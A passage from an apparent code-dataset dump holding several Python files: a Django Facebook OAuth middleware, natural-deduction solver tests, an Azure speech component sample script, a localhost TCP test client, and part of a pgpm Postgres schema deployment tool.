newview(view, request, *args, **kwargs):\n try:\n fb = request.facebook\n redirect_uri = fb.get_callback_path(request.path)\n valid_token = fb.oauth2_check_session(request)\n if valid_token and required_permissions:\n has_permissions = fb.oauth2_check_permissions(\n request, required_permissions, check_permissions,\n valid_token, force_check)\n else:\n has_permissions = True\n if not valid_token or not has_permissions:\n return fb.require_auth(next=redirect_uri,\n required_permissions=required_permissions)\n return view(request, *args, **kwargs)\n except FacebookError as e:\n # Invalid token (I think this can happen if the user logs out)\n # Unfortunately we don't find this out until we use the api \n if e.code == 190:\n del request.session['facebook']\n return fb.require_auth(next=redirect_uri,\n required_permissions=required_permissions)\n raise\n return newview\n\nclass FacebookMiddleware(object):\n \"\"\"\n Middleware that attaches a Facebook object to every incoming request.\n\n callback_path can be a string or a callable. 
Using a callable lets us\n pass in something like lambda reverse('our_canvas_view') so we can follow\n the DRY principle.\n \"\"\"\n\n def __init__(self, app_secret=None, app_name=None,\n callback_path=None, app_id=None,\n oauth2=None):\n self.app_secret = app_secret or settings.FACEBOOK_APP_SECRET\n self.app_name = app_name or getattr(settings, 'FACEBOOK_APP_NAME', None)\n self.callback_path = callback_path or getattr(settings,\n 'FACEBOOK_CALLBACK_PATH',\n None)\n self.app_id = app_id or getattr(settings, 'FACEBOOK_APP_ID', None)\n self.proxy = None\n if getattr(settings, 'USE_HTTP_PROXY', False):\n self.proxy = settings.HTTP_PROXY\n\n def process_request(self, request):\n callback_path = self.callback_path\n if callable(callback_path):\n callback_path = callback_path()\n request.facebook = Facebook(self.app_secret, app_name=self.app_name,\n callback_path=callback_path, proxy=self.proxy,\n app_id=self.app_id)\n response = request.facebook.oauth2_process_request(request)\n if response:\n return response\n if 'fb_sig_session_key' in request.GET and ('fb_sig_user' in request.GET or 'fb_sig_canvas_user' in request.GET):\n request.facebook.session_key = request.session['facebook_session_key'] = request.GET['fb_sig_session_key']\n request.facebook.uid = request.session['facebook_user_id'] = request.GET['fb_sig_user'] or request.GET['fb_sig_canvas_user']\n elif int(request.GET.get('fb_sig_added', '1')) and request.session.get('facebook_session_key', None) and request.session.get('facebook_user_id', None):\n request.facebook.session_key = request.session['facebook_session_key']\n request.facebook.uid = request.session['facebook_user_id']\n elif request.facebook.oauth2_token and not request.facebook.uid:\n request.facebook.uid = request.facebook.graph.filter('me').get()['id']\n\n def process_response(self, request, response):\n # Don't assume that request.facebook exists\n # - it's not necessarily true that all process_requests will have been called\n try:\n fb = request.facebook\n except AttributeError:\n return response\n\n fb.oauth2_process_response(request, response)\n\n if fb.session_key and fb.uid:\n request.session['facebook_session_key'] = fb.session_key\n request.session['facebook_user_id'] = fb.uid\n\n if fb.session_key_expires:\n expiry = datetime.datetime.utcfromtimestamp(fb.session_key_expires)\n request.session.set_expiry(expiry)\n\n return response\n","sub_path":"fbkit/djangokit/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"565625806","text":"import unittest\n\nfrom logics.classes.exceptions import SolverError\nfrom logics.utils.parsers import classical_parser\nfrom logics.utils.solvers import classical_natural_deduction_solver\nfrom logics.utils.formula_generators.generators_biased import random_formula_generator\nfrom logics.instances.propositional.languages import classical_infinite_language_with_sent_constants_nobiconditional \\\n as cl_language\nfrom logics.instances.propositional.many_valued_semantics import classical_mvl_semantics\nfrom logics.instances.propositional.natural_deduction import classical_natural_deduction_system as nd_system\n\n\nclass TestNaturalDeductionSolver(unittest.TestCase):\n def setUp(self):\n # Elimination rules (2nd function)\n self.conjunction_elimination = classical_parser.parse('p ∧ q / p')\n self.conditional_elimination = classical_parser.parse('p, p → q / q')\n self.modus_tollens = 
classical_parser.parse('~q, p → q / ~p')\n self.disjunction_elimination = classical_parser.parse('p ∨ q, p → r, q → r / r')\n self.double_negation = classical_parser.parse('~~p / p')\n self.de_morgan = classical_parser.parse('~(p ∨ q) / ~p ∧ ~q')\n self.de_morgan2 = classical_parser.parse('~(p ∧ q) / ~p ∨ ~q')\n self.conditional_negation = classical_parser.parse('~(p → q) / p')\n self.conditional_negation2 = classical_parser.parse('~(p → q) / ~q')\n self.negation_elimination = classical_parser.parse('p, ~p / ⊥')\n self.disjunctive_syllogism = classical_parser.parse('p ∨ q, ~p / q')\n self.disjunctive_syllogism2 = classical_parser.parse('p ∨ q, ~q / p')\n self.disjunctive_syllogism3 = classical_parser.parse('p ∨ ~q, q / p')\n\n self.derived_rules = [self.de_morgan2, self.de_morgan, self.conditional_negation, self.conditional_negation2,\n self.modus_tollens, self.disjunctive_syllogism, self.disjunctive_syllogism2,\n self.disjunctive_syllogism3]\n\n def test_solver_noclean(self):\n # Rules in the first function\n efsq = classical_parser.parse('⊥ / p')\n conjunction_introduction = classical_parser.parse('p1 ∧ p2, p3 ∧ p4 / p2 ∧ p3')\n conditional_introduction = classical_parser.parse('p, q / p → q')\n disjunction_introduction = classical_parser.parse('p / p ∨ q')\n reductio = classical_parser.parse('p → (q ∧ ~q) / ~p')\n repetitions1 = classical_parser.parse('p / p ∧ p')\n repetitions2 = classical_parser.parse('/ p → p')\n\n inferences = [efsq, conjunction_introduction, conditional_introduction, disjunction_introduction, reductio,\n repetitions1, repetitions2]\n inferences.extend(self.derived_rules)\n\n for inference in inferences:\n derivation = classical_natural_deduction_solver._solve_derivation(inference)\n # print(derivation)\n # print('\\n')\n\n conjunction_steps = classical_parser.parse('p, q, r / (q → p) ∧ (r → p)')\n derivation = classical_natural_deduction_solver._solve_derivation(conjunction_steps)\n # print(derivation)\n\n def test_delete_unused_steps(self):\n inference = classical_parser.parse('((p ∧ q) ∧ (q ∧ r)) / r')\n derivation = classical_natural_deduction_solver._solve_derivation(inference)\n # print(derivation)\n # print(solver._get_used_steps(derivation, inference))\n\n used_steps = classical_natural_deduction_solver._get_used_steps(derivation, inference)\n derivation = classical_natural_deduction_solver._delete_unused_steps(derivation, used_steps)\n # print(derivation)\n\n def test_replace_derived_rules(self):\n for inference in self.derived_rules:\n derivation = classical_natural_deduction_solver._solve_derivation(inference)\n # print('ORIGNAL\\n', derivation)\n\n derivation = classical_natural_deduction_solver._replace_derived_rules(derivation)\n # print('REPLACED\\n', derivation)\n # print('\\n')\n\n def test_with_generator(self):\n # Test with valid arguments and see that they are solved correctly\n unsolved = 0\n for _ in range(1000):\n inf = random_formula_generator.random_valid_inference(num_premises=2, num_conclusions=1,\n max_depth=3, atomics=['p', 'q', 'r'],\n language=cl_language,\n validity_apparatus=classical_mvl_semantics)\n could_solve = False\n try:\n derivation = classical_natural_deduction_solver.solve(inf)\n could_solve = True\n except SolverError:\n # warnings.warn(f'Could not solve the derivation of {classical_parser.unparse(inf)}', SolverWarning)\n unsolved += 1\n except Exception as e:\n print(classical_parser.unparse(inf))\n raise e\n\n if could_solve:\n try:\n self.assertTrue(nd_system.is_correct_derivation(derivation, inf))\n except Exception as 
e:\n print(classical_parser.unparse(inf))\n print(derivation)\n correct, error_list = nd_system.is_correct_derivation(derivation, inf, return_error_list=True)\n print(error_list)\n raise e\n\n # print(f'ND solver unsolved inferences = {unsolved}/1000')\n\n # Test with invalid arguments and see that they raise SolverError\n not_found_invalid = 0\n for _ in range(100):\n invalid = False\n for x in range(100):\n inf = random_formula_generator.random_inference(num_premises=2, num_conclusions=1, max_depth=3,\n atomics=['p', 'q', 'r'], language=cl_language)\n if not classical_mvl_semantics.is_valid(inf):\n invalid = True\n if invalid:\n break\n if x == 99:\n not_found_invalid += 1\n\n self.assertRaises(SolverError, classical_natural_deduction_solver.solve, inf)\n\n # print(f'Could not find invalid inference in {not_found_invalid} cases')\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/utils/test_natural_deduction_solver.py","file_name":"test_natural_deduction_solver.py","file_ext":"py","file_size_in_byte":6492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"645337179","text":"#!/usr/bin/env python3\n\n#############################################################################\n# NOTICE #\n# #\n# This software (or technical data) was produced for the U.S. Government #\n# under contract, and is subject to the Rights in Data-General Clause #\n# 52.227-14, Alt. IV (DEC 2007). #\n# #\n# Copyright 2020 The MITRE Corporation. All Rights Reserved. #\n#############################################################################\n\n#############################################################################\n# Copyright 2020 The MITRE Corporation #\n# #\n# Licensed under the Apache License, Version 2.0 (the \"License\"); #\n# you may not use this file except in compliance with the License. #\n# You may obtain a copy of the License at #\n# #\n# http://www.apache.org/licenses/LICENSE-2.0 #\n# #\n# Unless required by applicable law or agreed to in writing, software #\n# distributed under the License is distributed on an \"AS IS\" BASIS, #\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #\n# See the License for the specific language governing permissions and #\n# limitations under the License. 
#\n#############################################################################\n\nimport sys\nimport json\nimport argparse\nimport mimetypes\nfrom datetime import timedelta\n\nimport mpf_component_api as mpf\n\nfrom acs_speech_component import AcsSpeechComponent\n\ndef guess_type(filename):\n if filename.endswith('.mkv'):\n return ('video/x-matroska', None)\n return mimetypes.guess_type(filename)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description=(\n 'Sample Azure Speech component on audio or video files.'\n )\n )\n parser.add_argument('--start-time-millis', type=int)\n parser.add_argument('--stop-time-millis', type=int)\n parser.add_argument('--start-frame', type=int)\n parser.add_argument('--stop-frame', type=int)\n parser.add_argument('--frame-count', type=int)\n parser.add_argument('--fps', type=float)\n parser.add_argument('--duration', type=float)\n\n parser.add_argument('--acs-url', type=str)\n parser.add_argument('--acs-subscription-key', type=str)\n parser.add_argument('--acs-blob-container-url', type=str)\n parser.add_argument('--acs-blob-service-key', type=str)\n parser.add_argument('--language', type=str, default=\"en-US\")\n parser.add_argument('--no-cleanup', action='store_true')\n parser.add_argument('--blob-access-time', type=int, default=120)\n parser.add_argument('--json-file', type=str, default=None)\n parser.add_argument(\n 'files',\n nargs='+',\n help='locations of the audio or video files'\n )\n args = parser.parse_args()\n\n properties = dict(\n LANGUAGE=str(args.language),\n CLEANUP=str(not args.no_cleanup),\n BLOB_ACCESS_TIME=str(args.blob_access_time)\n )\n\n if args.acs_url is not None:\n properties['ACS_URL'] = str(args.acs_url)\n if args.acs_subscription_key is not None:\n properties['ACS_SUBSCRIPTION_KEY'] = str(args.acs_subscription_key)\n if args.acs_blob_container_url is not None:\n properties['ACS_BLOB_CONTAINER_URL'] = str(args.acs_blob_container_url)\n if args.acs_blob_service_key is not None:\n properties['ACS_BLOB_SERVICE_KEY'] = str(args.acs_blob_service_key)\n\n media_properties = dict()\n if args.duration is not None:\n media_properties['DURATION'] = str(args.duration)\n if args.fps is not None:\n media_properties['FPS'] = str(args.fps)\n if args.frame_count is not None:\n media_properties['FRAME_COUNT'] = str(args.frame_count)\n\n if not len(args.files):\n parser.error(\"Must provide at least one audio or video file\")\n\n filetype = guess_type(args.files[0])[0].split('/')[0]\n for uri in args.files:\n t = guess_type(uri)[0].split('/')[0]\n if t != filetype:\n parser.error((\n \"When processing multiple files, must either be all video or\"\n \" all audio ({:s} is a {:s} file, while {:s} is a {:s} file).\"\n ).format(args.files[0], filetype, uri, t))\n\n if filetype == 'audio':\n if args.fps is not None:\n parser.error(\n \"FPS not used when processing audio files.\"\n )\n if args.start_frame is not None or args.stop_frame is not None:\n parser.error(\n \"START_FRAME and STOP_FRAME not used when processing audio\"\n \" files. Use START_TIME_MILLIS and STOP_TIME_MILLIS.\"\n )\n elif filetype == 'video':\n if args.fps is None:\n parser.error(\n \"FPS must be provided when passing video files.\"\n )\n if args.start_time_millis is not None or args.stop_time_millis is not None:\n parser.error(\n \"START_TIME_MILLIS and STOP_TIME_MILLIS not used when\"\n \" processing video files. 
Use START_FRAME and STOP_FRAME.\"\n )\n else:\n parser.error(\n \"Provided file must be an audio or video file\"\n )\n\n comp = AcsSpeechComponent()\n for uri in args.files:\n print(\"Processing %s file: %s\"%(filetype,uri))\n if filetype == 'audio':\n start = args.start_time_millis\n stop = args.stop_time_millis\n if start is None:\n start = 0\n if stop is None:\n stop = -1\n dets = comp.get_detections_from_audio(mpf.AudioJob(\n job_name=\"acs_speech_sample:%s\"%uri,\n data_uri=uri,\n start_time=start,\n stop_time=stop,\n job_properties=properties,\n media_properties=media_properties,\n feed_forward_track=None\n ))\n\n elif filetype == 'video':\n start = args.start_frame\n stop = args.stop_frame\n if start is None:\n start = 0\n if stop is None:\n stop = -1\n dets = comp.get_detections_from_video(mpf.VideoJob(\n job_name=\"acs_speech_sample:%s\"%uri,\n data_uri=uri,\n start_frame=start,\n stop_frame=stop,\n job_properties=properties,\n media_properties=media_properties,\n feed_forward_track=None\n ))\n\n if args.json_file is not None:\n obj = []\n for det in dets:\n d = dict(det.detection_properties)\n d['CONFIDENCE'] = det.confidence\n if filetype == 'audio':\n d['START_TIME'] = det.start_time\n d['STOP_TIME'] = det.stop_time\n elif filetype == 'video':\n d['START_FRAME'] = det.start_frame\n d['STOP_FRAME'] = det.stop_frame\n obj.append(d)\n with open(args.json_file, 'w') as fout:\n json.dump(obj, fout)\n\n for det in dets:\n props = det.detection_properties\n speaker_id = props['SPEAKER_ID']\n transcript = props['TRANSCRIPT']\n\n print('SPEAKER ID: %s' % speaker_id)\n print(' CONFIDENCE: {:.2f}'.format(det.confidence))\n if filetype == 'audio':\n print(' SEGMENT: {} - {}'.format(\n timedelta(seconds=det.start_time // 1000),\n timedelta(seconds=det.stop_time // 1000)\n ))\n elif filetype == 'video':\n print(' FRAMES: {:d} - {:d}'.format(\n det.start_frame,\n det.stop_frame\n ))\n\n print(' TRANSCRIPT: {:s}'.format(transcript))\n","sub_path":"python/AzureSpeechDetection/sample_acs_speech_detector.py","file_name":"sample_acs_speech_detector.py","file_ext":"py","file_size_in_byte":8402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"633206208","text":"from anarchy.Client import client\nfrom anarchy.connection.tcp import TCPConnection\nfrom anarchy.cryptography.host import host\nfrom base64 import b64decode,b64encode\nfrom anarchy.coding.bencoding import Wrap\nimport time\nimport random\nfrom anarchy.connection.udp import UDPConnection\npk = host.load_pk('../../CLIEN1_PK',b'1234')\nkey = host.load_key('../../CLIEN1_KEY')\nflax = True\nwhile flax:\n # flax = False\n conn = TCPConnection()\n conn.connect(\"127.0.0.1\",1028)\n ring = random.randint(0,100000)\n params = {\n 'text' : str(random.randint(0,10000)*random.randint(0,10000)),\n # 'name' : 'roshan singh'\n }\n data_sign = str(b64encode(host.sign_str(pk, bstr=Wrap.reduceToBytes(Wrap.dictToBen(params)))), encoding='utf-8')\n data = {\n 'request' : ['post'],\n 'params' : params,\n 'data-sign' : data_sign\n # 'sign': input(),\n # 'ring': str(ring)\n }\n bstr = Wrap.reduceToBytes(Wrap.dictToBen(data))\n reqd = {\n 'request-data': {\n 'data': data,\n 'type': \"POST\",\n 'key': str(b64encode(host.gen_key_str(key)), encoding='utf-8'),\n 'sign': str(b64encode(host.sign_str(pk, bstr=bstr)), encoding='utf-8')\n },\n 'request-type': 'new'\n }\n req = client.request(reqd)\n # udp = UDPConnection()\n # udp.send(req,('127.0.0.1',1024))\n # data,addr = udp.recv()\n # print(data,addr)\n 
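    # Synchronous round-trip over TCP: push the signed request, block until
    # the response bytes arrive, then decode them; the commented-out UDP lines
    # above are an alternative transport experiment left in place.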
client.request_send(conn,req)\n    b = client.response_recv(conn)\n    d = client.response(b)\n    # if reqd['request-data']['type'] == 'POST':\n    #     b2 = client.response_recv(conn)\n    conn.close()\n    # print(b)\n    # print(d['response-data']['data']['db'][0][0]['post']['sign'])\n    # if host.verify_str(host.load_key_str(b64decode(d['response-data']['data']['db'][0]['user']['key'])),\n    #                    Wrap.reduceToBytes(Wrap.dictToBen(d['response-data']['data']['db'][0]['post']['signed-data'])),\n    #                    b64decode(d['response-data']['data']['db'][0]['post']['sign'])):\n    #     print(\"qazwsxedc\")\n    print(len(b))\n    time.sleep(0.001)","sub_path":"anarchy/test/start_client.py","file_name":"start_client.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"585175512","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nDeployment script that will deploy Postgres schemas to a given DB\nCopyright (c) Affinitas GmbH\n\nUsage:\n    pgpm deploy <connection_string> [-m <mode> | --mode <mode>]\n                [-o <owner_role> | --owner <owner_role>] [-u <user_role>... | --user <user_role>...]\n                [-f <file_name>... | --file <file_name>...] [--add-config <config_file_path>]\n    pgpm install <connection_string>\n    pgpm uninstall <connection_string>\n    pgpm -h | --help\n    pgpm -v | --version\n\nArguments:\n    <connection_string>       Connection string to postgres database.\n                              Can be in any format psycopg2 would understand\n\nOptions:\n    -h --help                 Show this screen.\n    -v --version              Show version.\n    -f <file_name>..., --file <file_name>...\n                              Use it if you want to deploy only specific files (functions, types, etc).\n                              In that case these files, if they exist, will be overridden.\n                              Should be followed by the list of names of files to deploy.\n    -o <owner_role>, --owner <owner_role>\n                              Role to which schema owner will be changed. User connecting to DB\n                              needs to be a superuser. If omitted, user running the script\n                              will be the owner of the schema\n    -u <user_role>..., --user <user_role>...\n                              Roles to which GRANT USAGE privilege will be applied.\n                              If omitted, default behaviour of DB applies\n    -m <mode>, --mode <mode>  Deployment mode. Can be:\n                              * safe. Add constraints to deployment. Will not deploy schema\n                              if it already exists in the DB\n                              * moderate. If schema exists, will try to rename it by adding suffix \"_<revision_number>\"\n                              and deploy new schema with old name\n                              * unsafe. allows cascade deleting of schema if it exists and adding new one\n                              [default: safe]\n    --add-config <config_file_path>\n                              Provides path to additional config file. 
Attributes of this file overwrite config.json\n\n\"\"\"\n\nimport os\nimport psycopg2\nimport json\nimport sqlparse\nimport re\nimport sys\nimport io\nimport pkgutil\n\nfrom pgpm.utils import config\n\nfrom pgpm import _version, _variables\nfrom pgpm.utils.term_out_ui import TermStyle\nfrom docopt import docopt\n\nSET_SEARCH_PATH = \"SET search_path TO {0}, public;\"\n\n\ndef connect_db(connection_string):\n \"\"\"\n Connect to DB or exit on exception\n \"\"\"\n print(TermStyle.PREFIX_INFO + 'Connecting to databases for deployment...')\n conn = psycopg2.connect(connection_string)\n cur = conn.cursor()\n print(TermStyle.PREFIX_INFO + 'Connected to {0}'.format(connection_string))\n\n return conn, cur\n\n\ndef close_db_conn(cur, conn, conn_string):\n \"\"\"\n Close DB connection and cursor\n \"\"\"\n print(TermStyle.PREFIX_INFO + 'Closing connection to {0}...'.format(conn_string))\n cur.close()\n conn.close()\n print(TermStyle.PREFIX_INFO + 'Connection to {0} closed.'.format(conn_string))\n\n\ndef schema_exists(cur, schema_name):\n \"\"\"\n Check if schema exists\n \"\"\"\n cur.execute(\"SELECT EXISTS (SELECT schema_name FROM information_schema.schemata WHERE schema_name = '{0}');\"\n .format(schema_name))\n return cur.fetchone()[0]\n\n\ndef create_db_schema(cur, schema_name, users, owner):\n \"\"\"\n Create Postgres schema script and execute it on cursor\n \"\"\"\n _create_schema_script = \"CREATE SCHEMA {0} ;\\n\".format(schema_name)\n if users:\n _create_schema_script += \"GRANT USAGE ON SCHEMA {0} TO {1};\\n\".format(schema_name, \", \".join(users))\n if owner:\n _create_schema_script += \"ALTER SCHEMA {0} OWNER TO {1};\\n\".format(schema_name, owner)\n _create_schema_script += SET_SEARCH_PATH.format(schema_name)\n cur.execute(_create_schema_script)\n print(TermStyle.PREFIX_INFO +\n 'Schema {0} was created and search_path was changed.'\n .format(schema_name))\n\n\ndef find_whole_word(w):\n \"\"\"\n Finds whole word\n \"\"\"\n return re.compile(r'\\b({0})\\b'.format(w), flags=re.IGNORECASE).search\n\n\ndef collect_scripts_from_files(script_paths, files_deployment):\n \"\"\"\n Collects postgres scripts from source files\n \"\"\"\n script_files_count = 0\n script = ''\n if script_paths:\n if not isinstance(script_paths, list):\n script_paths = [script_paths]\n if files_deployment: # if specific script to be deployed, only find them\n for list_file_name in files_deployment:\n if os.path.isfile(list_file_name):\n for i in range(len(script_paths)):\n if script_paths[i] in list_file_name:\n script_files_count += 1\n script += io.open(list_file_name, 'r', -1, 'utf-8-sig').read()\n script += '\\n'\n print(TermStyle.PREFIX_INFO_IMPORTANT + TermStyle.BOLD_ON +\n '{0}'.format(list_file_name) + TermStyle.RESET)\n else:\n print(TermStyle.PREFIX_WARNING + 'File {0} does not exist, please specify a correct path'.format(list_file_name))\n\n else:\n for script_path in script_paths:\n for subdir, dirs, files in os.walk(script_path):\n # print(subdir, dirs) # uncomment for debugging\n for file_info in files:\n script_files_count += 1\n script += io.open(os.path.join(subdir, file_info), 'r', -1, 'utf-8-sig').read()\n script += '\\n'\n print(TermStyle.PREFIX_INFO_IMPORTANT + TermStyle.BOLD_ON +\n '{0}'.format(os.path.join(subdir, file_info)) + TermStyle.RESET)\n return script, script_files_count\n\n\ndef get_scripts(path_parameter, config_data, files_deployment, script_type):\n \"\"\"\n Gets scripts from specified folders\n \"\"\"\n\n if path_parameter in config_data:\n path_value = 
config_data[path_parameter]\n else:\n path_value = None\n\n print(TermStyle.PREFIX_INFO + 'Getting scripts with {0} definitions'.format(script_type))\n script, files_count = collect_scripts_from_files(path_value, files_deployment)\n if path_value:\n if files_count == 0:\n print(TermStyle.PREFIX_WARNING + 'No {0} definitions were found in {1} folder'.format(script_type, path_value))\n else:\n print(TermStyle.PREFIX_INFO + 'No {0} folder was specified'.format(script_type))\n\n return script, files_count\n\n\ndef reorder_types(types_script):\n \"\"\"\n Takes type scripts and reorders them to avoid Type doesn't exist exception\n \"\"\"\n print(TermStyle.PREFIX_INFO + 'Running types definitions scripts')\n print(TermStyle.PREFIX_INFO + 'Reordering types definitions scripts to avoid \"type does not exist\" exceptions')\n _type_statements = sqlparse.split(types_script)\n # TODO: move up to classes\n _type_statements_dict = {} # dictionary that store statements with type and order.\n type_unordered_scripts = [] # scripts to execute without order\n for _type_statement in _type_statements:\n _type_statement_parsed = sqlparse.parse(_type_statement)\n if len(_type_statement_parsed) > 0: # can be empty parsed object so need to check\n # we need only type declarations to be ordered\n if _type_statement_parsed[0].get_type() == 'CREATE':\n _type_body_r = r'\\bcreate\\s+\\btype\\s+\\b(\\w+\\.\\w+|\\w+)\\b'\n _type_name = re.compile(_type_body_r, flags=re.IGNORECASE).findall(_type_statement)[0]\n _type_statements_dict[str(_type_name)] = \\\n {'script': _type_statement, 'deps': []}\n else:\n type_unordered_scripts.append(_type_statement)\n # now let's add dependant types to dictionary with types\n _type_statements_list = [] # list of statements to be ordered\n for _type_key in _type_statements_dict.keys():\n for _type_key_sub, _type_value in _type_statements_dict.items():\n if _type_key != _type_key_sub:\n if find_whole_word(_type_key)(_type_value['script']):\n _type_value['deps'].append(_type_key)\n # now let's add order to type scripts and put them ordered to list\n _deps_unresolved = True\n _type_script_order = 0\n _type_names = []\n type_ordered_scripts = [] # ordered list with scripts to execute\n while _deps_unresolved:\n for k, v in _type_statements_dict.items():\n if not v['deps']:\n _type_names.append(k)\n v['order'] = _type_script_order\n _type_script_order += 1\n if not v['script'] in type_ordered_scripts:\n type_ordered_scripts.append(v['script'])\n else:\n _dep_exists = True\n for _dep in v['deps']:\n if _dep not in _type_names:\n _dep_exists = False\n if _dep_exists:\n _type_names.append(k)\n v['order'] = _type_script_order\n _type_script_order += 1\n if not v['script'] in type_ordered_scripts:\n type_ordered_scripts.append(v['script'])\n else:\n v['order'] = -1\n _deps_unresolved = False\n for k, v in _type_statements_dict.items():\n if v['order'] == -1:\n _deps_unresolved = True\n return type_ordered_scripts, type_unordered_scripts\n\n\ndef install_manager(connection_string):\n \"\"\"\n Installs package manager\n \"\"\"\n conn, cur = connect_db(connection_string)\n\n # Create schema if it doesn't exist\n if schema_exists(cur,_variables.PGPM_SCHEMA_NAME):\n print(TermStyle.PREFIX_ERROR +\n 'Can\\'t install pgpm as schema {0} already exists'.format(_variables.PGPM_SCHEMA_NAME))\n close_db_conn(cur, conn, connection_string)\n sys.exit(1)\n else:\n # Prepare and execute preamble\n _deployment_script_preamble = pkgutil.get_data('pgpm', 'scripts/deploy_prepare_config.sql')\n 
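       # pkgutil.get_data() returns the bundled SQL resource as raw bytes; the preamble is\n        # executed unchanged, while the install template below is decoded first because\n        # str.format() must inject the schema name (see the author's own comment about\n        # byte strings just below).\n        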
print(TermStyle.PREFIX_INFO + 'Executing a preamble to install statement')\n        cur.execute(_deployment_script_preamble)\n\n        # Python 3.x doesn't have format for byte strings so we have to convert\n        _install_script = pkgutil.get_data('pgpm', 'scripts/install.tmpl.sql').decode('utf-8')\n        print(TermStyle.PREFIX_INFO + 'Installing package manager')\n        cur.execute(_install_script.format(schema_name=_variables.PGPM_SCHEMA_NAME))\n\n        _add_package_info = pkgutil.get_data('pgpm', 'scripts/functions/_add_package_info.sql')\n        cur.execute(_add_package_info)\n        cur.callproc('{0}._add_package_info'.format(_variables.PGPM_SCHEMA_NAME),\n                     [_variables.PGPM_SCHEMA_NAME, _variables.PGPM_SCHEMA_SUBCLASS, None,\n                      0, 0, 1, None, None, 'Package manager for Postgres', 'MIT'])\n\n    # Commit transaction\n    conn.commit()\n\n    close_db_conn(cur, conn, connection_string)\n\n\ndef main():\n    arguments = docopt(__doc__, version=_version.__version__)\n    user_roles = arguments['--user']\n    if arguments['--owner']:\n        owner_role = arguments['--owner'][0]\n    else:\n        owner_role = ''\n    files_deployment = arguments['--file']  # if specific script to be deployed, only find them\n    if arguments['install']:\n        install_manager(arguments['<connection_string>'])\n    elif arguments['deploy']:\n        # Load project configuration file\n        print('\\n' + TermStyle.PREFIX_INFO + 'Loading project configuration...')\n        config_json = open(_variables.CONFIG_FILE_NAME)\n        config_data = json.load(config_json)\n        config_json.close()\n        if arguments['--add-config']:\n            print('\\n' + TermStyle.PREFIX_INFO + 'Adding additional configuration file {0}'.\n                  format(arguments['--add-config']))\n            add_config_json = open(arguments['--add-config'])\n            config_data = dict(list(config_data.items()) + list(json.load(add_config_json).items()))\n            add_config_json.close()\n        config_obj = config.SchemaConfiguration(config_data)\n\n        # Check if owner role and user roles are to be defined with config files\n        if not owner_role and config_obj.owner_role:\n            owner_role = config_obj.owner_role\n        if not user_roles and config_obj.user_roles:\n            user_roles = config_obj.user_roles\n\n        print(TermStyle.PREFIX_INFO + 'Configuration of project {0} of version {1} loaded successfully.'\n              .format(config_obj.name, config_obj.version.to_string()))\n\n        # Get scripts\n        types_script, types_files_count = get_scripts(\"types_path\", config_data, files_deployment, \"types\")\n        functions_script, functions_files_count = get_scripts(\"functions_path\", config_data, files_deployment,\n                                                              \"functions\")\n        views_script, views_files_count = get_scripts(\"views_path\", config_data, files_deployment, \"views\")\n        tables_script, tables_files_count = get_scripts(\"tables_path\", config_data, files_deployment, \"tables\")\n        triggers_script, triggers_files_count = get_scripts(\"triggers_path\", config_data, files_deployment, \"triggers\")\n\n        # Connect to DB\n        conn, cur = connect_db(arguments['<connection_string>'])\n        # Check if DB is pgpm enabled\n        if not schema_exists(cur, _variables.PGPM_SCHEMA_NAME):\n            print('\\n' + TermStyle.PREFIX_ERROR + 'Can\'t deploy schemas to DB where pgpm was not installed. 
'\n                  'First install pgpm by running pgpm install')\n            close_db_conn(cur, conn, arguments['<connection_string>'])\n            sys.exit(1)\n\n        # Prepare and execute preamble\n        _deployment_script_preamble = pkgutil.get_data('pgpm', 'scripts/deploy_prepare_config.sql')\n        print(TermStyle.PREFIX_INFO + 'Executing a preamble to deployment statement')\n        # print(_deployment_script_preamble)\n        cur.execute(_deployment_script_preamble)\n\n        # Get schema name from project configuration\n        schema_name = ''\n        if config_obj.subclass == 'versioned':\n            schema_name = '{0}_{1}'.format(config_obj.name, config_obj.version.to_string())\n            print(TermStyle.PREFIX_INFO + 'Schema {0} will be updated'.format(schema_name))\n        elif config_obj.subclass == 'basic':\n            schema_name = '{0}'.format(config_obj.name)\n            if not arguments['--file']:\n                print(TermStyle.PREFIX_INFO + 'Schema {0} will be created/replaced'.format(schema_name))\n            else:\n                print(TermStyle.PREFIX_INFO + 'Schema {0} will be updated'.format(schema_name))\n\n        # Create schema or update it if exists (if not in production mode) and set search path\n        if arguments['--file']:  # if specific scripts to be deployed\n            if not schema_exists(cur, schema_name):\n                print(TermStyle.PREFIX_ERROR + 'Can\'t deploy scripts to schema {0}. Schema doesn\'t exist in database'\n                      .format(schema_name))\n                close_db_conn(cur, conn, arguments.get('<connection_string>'))\n                sys.exit(1)\n            else:\n                _set_search_path_schema_script = SET_SEARCH_PATH.format(schema_name)\n                cur.execute(_set_search_path_schema_script)\n                print(TermStyle.PREFIX_INFO +\n                      'Search_path was changed to schema {0}'.format(schema_name))\n        else:\n            if not schema_exists(cur, schema_name):\n                create_db_schema(cur, schema_name, user_roles, owner_role)\n            elif arguments['--mode'][0] == 'safe':\n                print(TermStyle.PREFIX_ERROR +\n                      'Schema already exists. It won\'t be overridden in safe mode. Rerun your script without '\n                      '\"-m moderate\" or \"-m unsafe\" flags')\n                close_db_conn(cur, conn, arguments.get('<connection_string>'))\n                sys.exit(1)\n            elif arguments['--mode'][0] == 'moderate':\n                _old_schema_exists = True\n                _old_schema_rev = 0\n                while _old_schema_exists:\n                    cur.execute(\"SELECT EXISTS (SELECT schema_name FROM information_schema.schemata \"\n                                \"WHERE schema_name = '{0}');\".format(schema_name + '_' + str(_old_schema_rev)))\n                    _old_schema_exists = cur.fetchone()[0]\n                    if _old_schema_exists:\n                        _old_schema_rev += 1\n                _old_schema_name = schema_name + '_' + str(_old_schema_rev)\n                print(TermStyle.PREFIX_INFO +\n                      'Schema already exists. It will be renamed to {0} in moderate mode. Renaming...'\n                      .format(_old_schema_name))\n                _rename_schema_script = \"ALTER SCHEMA {0} RENAME TO {1};\\n\".format(schema_name, 